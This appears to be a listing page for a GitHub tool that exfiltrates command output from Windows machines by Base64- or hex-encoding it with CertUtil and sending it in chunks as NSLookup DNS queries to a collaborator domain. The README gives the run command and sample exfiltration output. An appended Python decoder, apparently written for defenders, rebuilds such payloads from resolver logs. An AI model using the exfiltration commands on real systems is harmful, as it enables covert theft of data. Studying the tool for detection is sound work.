Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ivan-sincek/dns-exfiltrator
Exfiltrate data with DNS queries. Based on CertUtil and NSLookup.
- Host: GitHub
- URL: https://github.com/ivan-sincek/dns-exfiltrator
- Owner: ivan-sincek
- License: mit
- Created: 2021-01-21T13:09:43.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2023-12-30T20:23:18.000Z (12 months ago)
- Last Synced: 2024-10-17T16:21:25.575Z (2 months ago)
- Topics: batch, bug-bounty, burp-collaborator-server, certutil, dns, dns-query, ethical-hacking, exfiltrator, lolbas, malware, networking, nslookup, offensive-security, penetration-testing, red-team-engagement, security, wireshark
- Language: Batchfile
- Homepage:
- Size: 2.93 KB
- Stars: 21
- Watchers: 2
- Forks: 8
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# DNS Exfiltrator
Exfiltrate data with DNS queries. Based on CertUtil and NSLookup.
Base64 or Hex encode the command output using CertUtil, and then exfiltrate it in chunks up to 63 characters per query using NSLookup.
With Base64 encoding, some special characters are replaced because they are not allowed in domain names:
| Base64 Character | Replacement |
| --- | --- |
| \+ | plus |
| \/ | slash |
| \= | eqls |

Tested on Windows 10 Enterprise OS (64-bit).
Made for educational purposes. I hope it will help!
Future plans:
* create a Python script to parse `interact.sh` results,
* create a one-liner out of the whole Batch script,
* create a Burp Suite extension that will use a Burp Collaborator server.

## How to Run
Download, unpack, give necessary permissions, and run the latest [interact.sh](https://github.com/projectdiscovery/interactsh/releases) client:
```fundamental
chmod +x interactsh-client
./interactsh-client -dns-only -json -o interactsh.json
```

After running the tool, you should be able to see the `interact.sh` (collaborator server) subdomain, e.g. `xyz.oast.fun`.
Next, make sure to specify either `base64` or `hex` as the encoding, and [Base64 encode](https://www.base64encode.org) your Batch one-liner command, e.g. `whoami` encodes to `d2hvYW1p`.
Finally, open the Command Prompt from [\\src\\](https://github.com/ivan-sincek/dns-exfiltrator/tree/main/src) and run the following command:
```fundamental
dns_exfiltrator.bat xyz.oast.fun base64 d2hvYW1p
```

## Runtime
```fundamental
C:\Users\W10\Desktop>dns_exfiltrator.bat xyz.oast.fun base64 d2hvYW1pIC9wcml2

################################################################
#                                                              #
# DNS Exfiltrator v1.3                                         #
# by Ivan Sincek                                               #
#                                                              #
# Exfiltrate data with DNS queries.                            #
# GitHub repository at github.com/ivan-sincek/dns-exfiltrator. #
#                                                              #
################################################################

Server:  UnKnown
Address:  172.20.10.1

Non-authoritative answer:
Name:    UFJJVklMRUdFUyBJTkZPUk1BVElPTiANCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0.xyz.oast.fun
Address:  206.189.156.69

Server:  UnKnown
Address:  172.20.10.1

Non-authoritative answer:
Name:    gDQpQcml2aWxlZ2UgTmFtZSAgICAgICAgICAgICAgICBEZXNjcmlwdGlvbiAgIC.xyz.oast.fun
Address:  206.189.156.69

Server:  UnKnown
Address:  172.20.10.1

Non-authoritative answer:
Name:    AgICAgICAgICAgICAgICAgICAgICAgU3RhdGUgICAgDQo9PT09PT09PT09PT09P.xyz.oast.fun
Address:  206.189.156.69

...
```
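As an added example (not code from the repository), here is the defender-side counterpart to the encoding scheme above: an incident-response decoder that pulls the chunked labels for a domain out of resolver logs, joins them, reverses the `plus`/`slash`/`eqls` substitutions and decodes the result, including a capture that stops mid-chunk. The dnsmasq-style log lines, the `172.20.10.x` hosts and the short second payload are constructed; the three long labels are the ones from the runtime sample above, and the plain-hex handling is an assumption about the tool's `hex` mode.

```python
import base64
import re

# Constructed dnsmasq-style resolver log, not a real capture. The queries from
# 172.20.10.5 are the three chunks in the README's runtime sample; the one from
# 172.20.10.9 is a constructed payload using the "slash"/"eqls" substitutions.
# Use a case-preserving source (pcap, query log): Base64 is case-sensitive.
SAMPLE_LOG = """\
Oct 17 16:21:25 dnsmasq[812]: query[A] UFJJVklMRUdFUyBJTkZPUk1BVElPTiANCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0.xyz.oast.fun from 172.20.10.5
Oct 17 16:21:25 dnsmasq[812]: query[A] gDQpQcml2aWxlZ2UgTmFtZSAgICAgICAgICAgICAgICBEZXNjcmlwdGlvbiAgIC.xyz.oast.fun from 172.20.10.5
Oct 17 16:21:26 dnsmasq[812]: query[A] AgICAgICAgICAgICAgICAgICAgICAgU3RhdGUgICAgDQo9PT09PT09PT09PT09P.xyz.oast.fun from 172.20.10.5
Oct 17 16:21:26 dnsmasq[812]: query[A] www.example.com from 172.20.10.7
Oct 17 16:21:30 dnsmasq[812]: query[A] b2sslashIHVzZXI9dzEwDQoeqls.xyz.oast.fun from 172.20.10.9
"""
QUERY_RE = re.compile(r"query\[\w+\] (?P<name>\S+) from (?P<src>\S+)")
SUBSTITUTIONS = {"plus": "+", "slash": "/", "eqls": "="}

def extract_chunks(log_text, domain, min_label_len=20):
    """Map each querying host to the leading labels of its queries under
    `domain`, in log order. Short labels are skipped as unlikely chunks."""
    per_host, suffix = {}, "." + domain.lower()
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m or not m.group("name").lower().endswith(suffix):
            continue
        label = m.group("name")[: -len(suffix)]
        if "." not in label and len(label) >= min_label_len:
            per_host.setdefault(m.group("src"), []).append(label)
    return per_host

def decode_chunks(chunks, encoding="base64"):
    """Rebuild one host's payload. Returns (data, dropped), where `dropped`
    counts trailing characters lost because the capture ended mid-group."""
    # Join before undoing substitutions: a token such as "slash" can straddle
    # two chunks. Reversal is best-effort (Base64 can contain these letters).
    text = "".join(chunks)
    for token, char in SUBSTITUTIONS.items():
        text = text.replace(token, char)
    if encoding == "hex":  # assumes plain hex digits, two per byte
        dropped = len(text) % 2
        return bytes.fromhex(text[: len(text) - dropped]), dropped
    dropped = 1 if len(text) % 4 == 1 else 0  # a lone sextet holds no byte
    text = text[: len(text) - dropped]
    text += "=" * (-len(text) % 4)            # pad a truncated final group
    return base64.b64decode(text), dropped

if __name__ == "__main__":
    for host, chunks in extract_chunks(SAMPLE_LOG, "xyz.oast.fun").items():
        data, dropped = decode_chunks(chunks)
        print(host, len(chunks), "chunk(s),", dropped, "char(s) lost:", data)
```

On real logs, split one host's labels into sessions by time gap before decoding, since the per-host grouping here assumes a single transfer.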